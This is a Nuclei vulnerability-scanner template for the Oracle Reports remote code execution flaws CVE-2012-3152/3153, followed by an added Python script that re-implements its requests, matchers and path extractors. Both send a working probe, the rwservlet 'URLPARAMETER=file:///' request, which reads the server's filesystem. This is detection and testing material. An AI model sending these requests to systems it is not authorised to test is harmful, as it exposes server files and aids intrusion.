AI Score: 5.8 Medium (confidence: Low)
CVSS2: 6.4 Medium, AV:N/AC:L/Au:N/C:P/I:P/A:N (Access Vector: NETWORK; Access Complexity: LOW; Authentication: NONE; Confidentiality Impact: PARTIAL; Integrity Impact: PARTIAL; Availability Impact: NONE)
EPSS: 0.974 High (percentile: 99.9%)
id: CVE-2012-3153

info:
  name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
  author: Sid Ahmed MALAOUI @ Realistic Security
  severity: medium
  description: |
    An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
    11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
    vectors related to Report Server Component.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution.
  remediation: |
    Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2012-3152
    - https://www.exploit-db.com/exploits/31737
    - https://www.oracle.com/security-alerts/cpuoct2012.html
    - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
    - http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
    cvss-score: 6.4
    cve-id: CVE-2012-3153
    cwe-id: NVD-CWE-noinfo
    epss-score: 0.95986
    epss-percentile: 0.99354
    cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: oracle
    product: fusion_middleware
  tags: cve,cve2012,oracle,rce,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/reports/rwservlet/showenv"
      - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "Reports Servlet")'

      - type: dsl
        dsl:
          - '!contains(body_2, "<html")'
          - '!contains(body_2, "<HTML")'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: windows_working_path
        regex:
          - ".?.?\\\\.*\\\\showenv"

      - type: regex
        name: linux_working_path
        regex:
          - "/.*/showenv"
# digest: 490a004630440220313eb38f60fc28f0dce1be3540aaf746cf4c91263f5b48bb9c708d4edec787fb02206c7774b898dcf56316c62f0315acb6ed2b6061ab7dc8146523fb664c34e69ffa:922c64590222798bb761d5b6d8e72950
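The following Python script is an added example, not part of the template above or of the Nuclei project. It re-implements the template's two requests, its matchers and its two extractors so the logic can be exercised offline against constructed responses, and it can be pointed at a live host through a pluggable fetcher. The host name reports.example, the sample showenv bodies, the directory-listing and HTML-error bodies, and the helper names (build_requests, template_matches, extract_working_paths, run_check, make_fake_fetcher, http_fetch) are all assumptions of this example; so is the choice to require a 200 status from both responses, since the template's status matcher does not say which response it applies to.

```python
import re
import urllib.error
import urllib.request
from typing import Callable, Optional

# Extractor regexes copied from the template. The YAML string
# ".?.?\\\\.*\\\\showenv" unquotes to the pattern .?.?\\.*\\showenv: a literal
# backslash, anything, another backslash, then "showenv". The two optional
# leading characters pick up a Windows drive prefix such as "C:".
WINDOWS_PATH_RE = re.compile(r".?.?\\.*\\showenv")
LINUX_PATH_RE = re.compile(r"/.*/showenv")

# Constructed sample responses (assumptions, not captured from a real host).
SHOWENV_LINUX = """Reports Servlet Environment Variables
REPORTS_TMP=/u01/app/oracle/middleware/asinst_1/tmp
SERVLET_PATH=/reports/rwservlet/showenv
"""
SHOWENV_WINDOWS = r"""Reports Servlet Environment Variables
REPORTS_TMP=C:\Temp
SERVLET_PATH=C:\Oracle\Middleware\reports\rwservlet\showenv
"""
DIR_LISTING = "bin\nboot\netc\nhome\nopt\nu01\nusr\nvar\n"   # raw file:/// content, no HTML
HTML_ERROR = "<HTML><BODY>Report job failed</BODY></HTML>"   # what a patched host might return


def build_requests(base_url: str) -> list:
    """The two GET requests the template sends, in order."""
    base = base_url.rstrip("/")
    return [
        f"{base}/reports/rwservlet/showenv",
        f"{base}/reports/rwservlet?report=test.rdf&desformat=html"
        "&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///",
    ]


def template_matches(status_1: int, body_1: str, status_2: int, body_2: str) -> bool:
    """matchers-condition: and, over the showenv and URLPARAMETER responses.

    Assumption: the status matcher is taken to require 200 from both responses.
    """
    showenv_ok = "Reports Servlet" in body_1                     # first dsl matcher
    raw_fetch = "<html" not in body_2 and "<HTML" not in body_2  # second dsl matcher
    return showenv_ok and raw_fetch and status_1 == 200 and status_2 == 200


def extract_working_paths(body_1: str) -> dict:
    """Named extractors: first match of each regex in the showenv body."""
    found = {}
    for name, rx in (("windows_working_path", WINDOWS_PATH_RE),
                     ("linux_working_path", LINUX_PATH_RE)):
        m = rx.search(body_1)
        if m:
            found[name] = m.group(0)
    return found


def run_check(base_url: str, fetch: Callable[[str], tuple]) -> Optional[dict]:
    """Send both requests through `fetch`; return extracted data on a match, else None."""
    showenv_url, urlparam_url = build_requests(base_url)
    status_1, body_1 = fetch(showenv_url)
    status_2, body_2 = fetch(urlparam_url)
    if not template_matches(status_1, body_1, status_2, body_2):
        return None
    return {"base_url": base_url, **extract_working_paths(body_1)}


def make_fake_fetcher(showenv_body: str, urlparam_body: str, status: int = 200):
    """Offline fetcher serving the constructed bodies; keyed on the showenv suffix."""
    def fetch(url: str) -> tuple:
        return status, (showenv_body if url.endswith("/showenv") else urlparam_body)
    return fetch


def http_fetch(url: str, timeout: float = 10.0) -> tuple:
    """Live fetcher for a host you are authorised to test; not used offline."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


if __name__ == "__main__":
    print(run_check("http://reports.example", make_fake_fetcher(SHOWENV_LINUX, DIR_LISTING)))
    print(run_check("http://reports.example", make_fake_fetcher(SHOWENV_LINUX, HTML_ERROR)))
```

Two things this makes visible that the YAML alone does not. First, the second matcher is purely negative: any 200 response to the URLPARAMETER request that happens not to contain "<html" or "<HTML" satisfies it, so a hit should be confirmed by reading body_2 for the expected file:/// content rather than trusted on the matcher alone. Second, the extractors run only over the showenv body, and the Windows regex deliberately swallows two leading characters so the drive letter survives in windows_working_path.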